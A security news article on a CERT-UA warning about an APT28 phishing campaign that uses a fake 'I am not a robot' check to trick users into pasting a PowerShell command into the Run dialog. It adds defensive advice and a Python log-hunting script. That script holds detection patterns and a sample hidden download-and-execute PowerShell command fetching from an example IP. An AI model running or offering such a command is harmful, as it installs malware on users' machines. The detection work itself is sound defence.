New Cyber Attack Warning—Confirming You Are Not A Robot Can Be Dangerous



    Update, Oct. 28, 2024: This story, originally published Oct. 26, has been updated with additional cyber attack mitigation advice.

    The Ukrainian Computer Emergency Response Team (CERT-UA) has issued a new security warning after discovering a cyber attack campaign carried out by the APT28 threat group, also known as Fancy Bear. The group is attributed, with a high degree of confidence, to Russian military intelligence (the GRU). Here's what we know so far and what you need to watch out for if you think you might be a target.

    The APT28 Fancy Bear Cyber Attack Campaign Warning From CERT-UA

    The CERT-UA warning, number CERT-UA#11689, was published Oct. 25 and, read via Google's on-page translation, describes an ongoing investigation into a phishing campaign. The emails carry what looks like a database table together with a link; following the link leads to a page that mimics a Google reCAPTCHA bot-detection dialog.


    Most users see these anti-bot CAPTCHA prompts far less often than they used to, partly because many browser extensions solve them automatically and partly because iOS now uses Apple's server-based Automatic Verification (Private Access Tokens) to vouch for the device so the user never has to complete one. Still, a CAPTCHA appearing is not an unusual event, and, as the Fancy Bear operators are counting on, it is not something that would arouse suspicion. If anything, the opposite: an anti-bot check signals a legitimate, security-conscious site rather than a dangerous one.

    In this campaign, CERT-UA said that ticking the "I am not a robot" checkbox copies a malicious PowerShell command to the user's clipboard; nothing runs at that point, and the rest of the attack depends on the user pasting and executing it. APT28 is not to be confused with APT29, tracked by Microsoft as Midnight Blizzard, another Russian state-sponsored group also currently engaged in targeted anti-Ukraine cyber attack activity, as confirmed by Google's Threat Analysis Group and Mandiant.

    Mitigating The Risk Of Falling Victim To The CAPTCHA Cyber Attack

    OK, so the most important point to be made here is that the campaign in question appears to be highly targeted at local government workers in Ukraine. That immediately removes much of the concern for everyone else. However, it does not mean other threat actors will not reuse the same technique now that the methodology is public and apparently fooling some victims. So you still need to understand the threat and how to mitigate it.


    Which brings me to the second important point: the attack is initiated by clicking a link in the email (don't do that), which loads the page with the fake "I am not a robot" dialog. Even if you get that far, more interaction is required before the payload runs: ticking the box only places the PowerShell command on the clipboard, and the page then instructs the user to carry out several further steps by hand.

    These steps are: press Win+R to open the Windows Run dialog, press Win+V to open clipboard history and paste the command into it, and finally press Enter to execute the command, which downloads and installs the malware. That's a lot of steps, requiring a lot of trust, from the user. Don't be that trusting. Period. Ask yourself: when has a website ever asked me to do something like this before? I'd bet my house that, for 99.9% of people, the answer is never. So why start now? With cyber attack campaigns, especially those involving AI-boosted phishing techniques, it's easy to forget that most still rely on good old-fashioned trickery. Stay alert, don't let work pressure or a knee-jerk reaction push you into an unnecessary risk, and you can keep even state-sponsored hackers at bay.
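    User awareness is the first line of defense, but the three-step chain above also leaves a recognisable trace in process-creation telemetry: a command typed or pasted into the Run dialog is started by explorer.exe, so the malware's first stage appears as explorer.exe spawning powershell.exe with a hidden window and a download-and-execute command line. The following Python hunt is an added example written for this article, not code from CERT-UA or from the campaign; it parses constructed Sysmon-style Event ID 1 records (the key="value" line format, the host names, user names and IP addresses are all assumed for the example) and flags only events that show both the Run-dialog lineage and at least two behavioural indicators, so an administrator who simply launches "powershell" from Win+R is not paged.

```python
"""Hunt process-creation logs for the Win+R, paste, Enter (ClickFix-style) chain.

Added example: the log format below is a constructed, flattened rendering of
Sysmon Event ID 1 fields; adapt parse_event() to your SIEM's actual export.
"""
import re
from dataclasses import dataclass

# The Run dialog is hosted by explorer.exe, so a pasted command shows up as
# explorer.exe spawning the interpreter directly.
RUN_DIALOG_PARENTS = {"explorer.exe"}
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line features typical of the pasted payload: hidden window, policy
# bypass or encoded command, and a download-then-execute stage.
SUSPICIOUS = [
    re.compile(p, re.IGNORECASE) for p in (
        r"-w(?:indowstyle)?\s+hidden",
        r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}",
        r"-ep\s+bypass|-executionpolicy\s+bypass",
        r"\biex\b|invoke-expression",
        r"\b(?:iwr|irm|curl|wget)\b|invoke-webrequest|invoke-restmethod|downloadstring",
        r"https?://",
    )
]

@dataclass
class ProcEvent:
    parent: str    # basename of ParentImage, lower-cased
    image: str     # basename of Image, lower-cased
    cmdline: str
    user: str

def parse_event(line: str) -> ProcEvent:
    """Parse one key="value" record (values may not contain double quotes)."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(
        parent=fields.get("ParentImage", "").rsplit("\\", 1)[-1].lower(),
        image=fields.get("Image", "").rsplit("\\", 1)[-1].lower(),
        cmdline=fields.get("CommandLine", ""),
        user=fields.get("User", ""),
    )

def score(ev: ProcEvent) -> list[str]:
    """Return the matched indicator patterns; an empty list means not flagged."""
    if ev.parent not in RUN_DIALOG_PARENTS or ev.image not in INTERPRETERS:
        return []
    hits = [p.pattern for p in SUSPICIOUS if p.search(ev.cmdline)]
    # Lineage alone is noisy (admins do launch PowerShell from Win+R), so
    # require at least two behavioural indicators on top of it.
    return hits if len(hits) >= 2 else []

def hunt(lines):
    """Yield (event, matched_indicators) for every flagged record."""
    return [(ev, hits) for ev in map(parse_event, lines) if (hits := score(ev))]

# Constructed sample records: one ClickFix-style chain, one admin launching a
# plain PowerShell from the Run dialog, one download from a non-Run parent,
# and one harmless Run-dialog PowerShell one-liner.
SAMPLE_LOG = [
    'EventID="1" User="CORP\\jdoe" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -w hidden -ep bypass -c iex (iwr http://198.51.100.7/verify.txt -UseBasicParsing)"',
    'EventID="1" User="CORP\\admin" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell"',
    'EventID="1" User="CORP\\build" ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -c iwr https://example.internal/tools.zip -OutFile t.zip"',
    'EventID="1" User="CORP\\jdoe" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -c Get-Date"',
]

if __name__ == "__main__":
    for ev, hits in hunt(SAMPLE_LOG):
        print(f"FLAGGED user={ev.user} {ev.parent} -> {ev.image}: {ev.cmdline}")
        for h in hits:
            print("   indicator:", h)
```

    The third sample is deliberately not flagged even though it downloads something: this rule targets the Run-dialog lineage specifically, and a download from cmd.exe belongs to a different detection. Tune the threshold and the indicator list to your environment, and pair the rule with the preventive controls that make the chain impossible for ordinary users, such as disabling the Run dialog and clipboard history by policy on workstations that never need them.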


    What To Do If You Have Been Compromised By This Kind Of Cyber Attack

    In the unlikely event that your systems have been compromised by this APT28 campaign, or anything similar, activate your incident response plan immediately. If you don't have one, guidance from the U.K. National Cyber Security Centre suggests the following steps to limit the impact:

    • Disconnect infected computers, laptops or tablets from all network connections, whether wired, wireless or mobile phone based.
    • Reset credentials including passwords, after verifying you are not locking yourself out of systems needed for recovery.
    • Wipe infected devices and reinstall the OS.
    • Verify any backup is free from malware before restoring.
    • Connect devices to a clean network in order to download, install and update the OS and all other software.
    • Install, update, and run antivirus software.
    • Monitor network traffic and run antivirus scans to identify if any infection remains.

    Meanwhile, the Federal Trade Commission advises that if you have clicked a link or opened an attachment that may have downloaded malware onto your device then you should do the following:

    • Do not log in to any accounts or enter any sensitive information.
    • Update your security software to make sure you have the latest protections.
    • Execute a security scan once you have the latest updates and remove any malware detected.
    • Change passwords on accounts that might be impacted.
    • Enable two-factor authentication where available to prevent hackers from reconnecting if they have already compromised an account.

    And finally, in the event of any successful cyber attack, you should report this to the relevant authorities whether you have a statutory obligation to or not. The U.S. Government Cybersecurity and Infrastructure Security Agency has such a reporting portal.
